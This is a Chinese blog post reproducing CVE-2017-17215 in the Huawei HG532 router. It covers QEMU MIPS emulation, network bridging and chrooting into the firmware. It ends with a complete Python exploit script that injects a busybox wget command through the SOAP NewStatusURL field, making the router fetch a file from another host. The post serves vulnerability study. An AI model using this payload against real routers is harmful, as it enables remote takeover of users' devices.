CVE-2017-17215复现,主要是解决qemu和主机连接问题,后续会继续深入分析该漏洞文件

最新推荐文章于 2022-11-02 11:31:27 发布
最新推荐文章于 2022-11-02 11:31:27 发布
阅读量586 收藏 1
点赞数
分类专栏: 漏洞复现验证 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/darui_csdn/article/details/107878247
版权

一、基本信息:

定制版的华为HG532具有远程执行代码漏洞。 经过身份验证的攻击者可以将恶意数据包发送到端口37215,以发起攻击。 成功的利用可能导致远程执行任意代码。该漏洞payload由蜜罐所捕获发现。利用原理是利用upnp服务中的注入漏洞实现任意命令执行。

二、配置复现环境:

1. 安装qemu

sudo apt-get install qemu 
sudo apt-get install qemu-user-static
sudo apt-get install qemu-system

2. 网络配置

安装网络配置工具:

apt-get install bridge-utils uml-utilities

修改 ubuntu主机网络配置,将ubuntu主机系统中的网络接口配置文件 /etc/network/interfaces 修改为如下内容:image-20200808123343772

创建QEMU的网络接口启动脚本(/etc/qemu-ifup)并保存为如下内容:

image-20200808123601626

启动桥接网络
赋予可执行权限

sudo chmod a+x /etc/qemu-ifup

重启网络服务,使配置生效

sudo /etc/init.d/networking restart

关闭ens33,启动桥接网络br0

sudo ifdown eth0
sudo ifup br0

执行到这里时,系统提示eh0并未启动。这里并不影响

3. 加载debian镜像文件

从https://people.debian.org/~aurel32/qemu/mips/下载对应的debian mips qemu镜像

image-20200808123804972

其他的帖子里有各种下载qemu镜像的地址,试了几个下载都不好用,各种坑

我下载的是debian_squeeze_mips_standard.qcow2和vmlinux-2.6.32-5-4kc-malta。

启动qemu运行刚镜像:

sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic,macaddr=00:16:3e:00:00:01 -net tap

可以看到一个qemu虚拟机,用root/root登录进去:image-20200808123834874 看一下网络接口:image-20200808123922192

将nano /etc/network/interfaces 文件中的eth0改为eth1:image-20200808123943870

再用ifup eth1 将eth1启起来,运气好的话此时网络已经好了。

然而这里可能一直运气不好,记录:尝试过重启、重启网络、重启接口。给qemu配置新的网络192.168.0.127 ,可以实现主机和虚拟机之间互通

~ # ifconfig eth1 192.168.0.127 netmask 255.255.255.0
~ # route add default gw 192.168.0.1

image-20200808122850994

直接操作虚拟机显然比较麻烦,在ubuntu上搞个SSH 连进来,ssh root@虚拟机ipimage-20200808124030390

将之前解压的固件包拷贝到虚拟机里面:

scp -r ./squashfs-root root@虚拟机ip:/root/

image-20200808123051792

完成搭建路由器固件运行的环境。

三、复现漏洞:

1. 定位漏洞点

第一个问题是怎么让路由器里的服务启起来,我们也不知道是哪个文件会去处理80端口过来的请求,先看下checkpoint[https://research.checkpoint.com/2017/good-zero-day-skiddie/]报告里的payload

image-20200808124100855

注意其中的关键字:ctrltDeviceUpgrade_1,通过**grep -r [keywords]*指令查看有哪些文件包含这两个词语:image-20200808124144148

再找下端口号37215所在文件。image-20200808124210520

2. 运行漏洞点服务

要运行upnp和mic这两个文件,需要先切换根目录到路由器文件系统中

切换到路由器文件系统指令:

chroot /root/squashfs-root /bin/sh

或者执行qemu中squashfs-root文件夹中执行

chroot . sh

达到切换固件跟录下的目的。结果如下图所示:image-20200808124234603

image-20200808124317366

3. 验证漏洞

这时测试一下路由器的37215端口,image-20200808125304655

在ubantu上键入指令sudo nc -vlp 80 监听本机80端口,接下来运行exp脚本验证漏洞。

四、EXP 脚本

根据披露的payload,构造EXP 脚本如下:image-20200808124726977

exp代码如下:

import requests

headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}

data = '''<?xml version="1.0" ?>
 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
   <NewStatusURL>;/bin/busybox wget -g 192.168.0.126 -l /tmp/1 -r /1;</NewStatusURL>
   <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  </u:Upgrade>
 </s:Body>
</s:Envelope>
'''
requests.post('http://192.168.0.127:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)
darui_csdn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
华为HG532系列路由器命令注入漏洞复现 CVE-2017-17215
afei001
11-02 1072
华为HG532系列路由器是一款为家庭和小型办公用户打造的高速无线路由器产品。2017年11月27日Check Point团队报告华为HG532产品的远程命令执行漏洞(CVE-2017-17215)。通过认证的攻击者可以向37215端口发送恶意报文进行攻击。成功的利用可能导致远程执行任意代码。据vuldb描述,该漏洞被作为一个非公开的零日漏洞处理了至少85天。
复现CVE-2017-17215解决连接问题
darui_csdn的博客
09-04 465
对于该漏洞在FreeBuf上有分析文章,笔者按照该文章进行学习复现,但是一直卡在网络问题,后来发现其实是个配置网络的小问题。这里记录一下。 启动qemu运行刚镜像: sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic,macaddr=00:16:3e:00:
华为路由器 CVE 2017-17215 命令注入漏洞复现
weixin_44229639的博客
12-09 4051
华为路由器 CVE 2017-17215 命令注入漏洞复现
CVE-2017-17215(华为HG532远程命令执行漏洞)复现问题解决方案
a5555678744的博客
09-29 1548
环境准备: qemu环境的准备: 可以看freebuf上大佬的博客 通过CVE-2017-17215学习路由器漏洞分析,从入坑到放弃 - FreeBuf网络安全行业门户d 注意事项: 1.最好就用Ubuntu16.04,不要问我为什么知道的,强上Ubuntu20.04留下的只有泪。 2.上面这一步中可能遇到qemu-ifup这个文件本身就存在的问题,建议备份之后删掉重写成博客中那个样子。 3.博客中从eth0切换到eth1的操作好像是必定要做的,但是我遇到了一个严重的问题,q.
3路由器搭建php_华为路由器漏洞CVE-2017-17215复现分析
weixin_33460449的博客
01-09 275
0x00 漏洞描述CheckPoint报告华为HG532产品存在远程命令执行漏洞,华为HG532 系列路由器是一款为家庭和小型办公用户打造的高速无线路由器产品,如下是京东搜索的结果。远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数例如一个PHP作为后端的漏洞实例<?php...
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 6988
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
该程序可以提取由于授权问题影响...CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
VENOM cve-2015-3456 Qemu 虚拟机逃逸漏洞win平台exe利用工具
11-29
VENOM cve-2015-3456 Qemu 虚拟机逃逸漏洞POC,可以实行堆溢出攻击。
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
该程序可以提取由于授权问题影响的多款Hikvision产品的config...CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不使用可以私信我,直接差评的一律自理)
CVE-2017-17215 HG532e 远程命令执行漏洞分析
tigerOrtiger的博客
11-10 3491
CVE-2017-17215 HG532e 远程命令执行漏洞分析 0x01 前言 HG532e 是华为的一款无线路由器。 这个漏洞是由蜜罐捕获到payload 之后,才被checkpoint 披露出来的。 这都是好几年前的洞了,但是可以作为分析固件,模拟固件很好的学习例子。 接下来跟我一起来体验跑固件的乐趣吧 …QAQ happy hacking !!! 0x02 搭建固件模拟环境 首先固件模拟,需要现成的固件 下载链接 HG532e 下载不了可以留言给我。 固件模拟这里有两种方式: 一种是 利用现有
华为HG532系列路由器命令注入漏洞分析 CVE-2017-17215
afei001
11-02 1559
这是afei入门IOT安全复现的第一个漏洞。在此之前通过黑盒已经get到了某路由器的一枚RCE,但我想了解漏洞原理,于是就来学习了,之前看了腹黑、孙爱民师傅的IOT漏洞挖掘的分享,学到了很多,希望这篇文章也能带领大家入门IOT安全。
华为路由器CVE-2017-17215-HG532
PMJ的博客
01-22 5868
华为路由器CVE-2017-17215-HG532 漏洞描述 官方 该远程命令执行漏洞是位于UPnP服务中的,该设备支持名为DeviceUpgrade的一种服务类型 设备可以通过这种服务更新固件,具体过程是向“/ctrlt/DeviceUpgrade_1”这个地址提交请求,请求中包含NewStatusURL及NewDownloadURL两个元素。远程管理员可以通过该漏洞在设备上执行任意命令 将shell元字符 注入NewStatusURL以及NewDownloadURL元素中。 分析漏洞 下载固件: ht
CVE-2017-17215-HG532命令注入漏洞分析
蚁景网安学院
03-07 2757
点击蓝字关注我们上周刚学习路由器固件分析,并尝试复现了一个简单的CVE。中间遇到了很多的坑点,虽然把漏洞复现了,但是过程可谓曲折。ps:该文章以复现CVE-2017-17215为基础,提供...
qemu 规范路径_QEMU 路径遍历漏洞|CVE-2020-7211|CNNVD-202001-855|互联网安全漏洞库 | 指尖安全 | 垂直互联网安全媒体...
weixin_28465009的博客
02-04 144
来源:security-tracker.debian.org链接:https://security-tracker.debian.org/tracker/CVE-2020-7211来源:gitlab.freedesktop.org链接:https://gitlab.freedesktop.org/slirp/libslirp/commit/14ec36e107a8c9af7d0a80c3571fe...
[漏洞复现]CVE-2017-17010
Vicl1fe的博客
12-19 1481
环境 攻击机:kali2019.04 靶机:windows 7 攻击机IP:192.168.34.80 靶机IP:192.168.34.81 漏洞复现
CVE-2017-15715(Apache解析漏洞)
u014794539的博客
07-25 1021
Apache换行解析漏洞 影响版本:Apache 2.4.0~2.4.29 影响说明:绕过服务器策略,上传webshell 环境说明:PHP5.5 、 Apache2.4.10 漏洞复现利用如下 打开环境即是个文件上传点 先上潮汐看 Apache 百度搜一波 我们利用CVE-2017-15715(Apache换行解析漏洞) 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照php 后缀进行解析,导致绕过一些服务器的安全策
cve-2017-7504漏洞复现
最新发布
08-23
对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值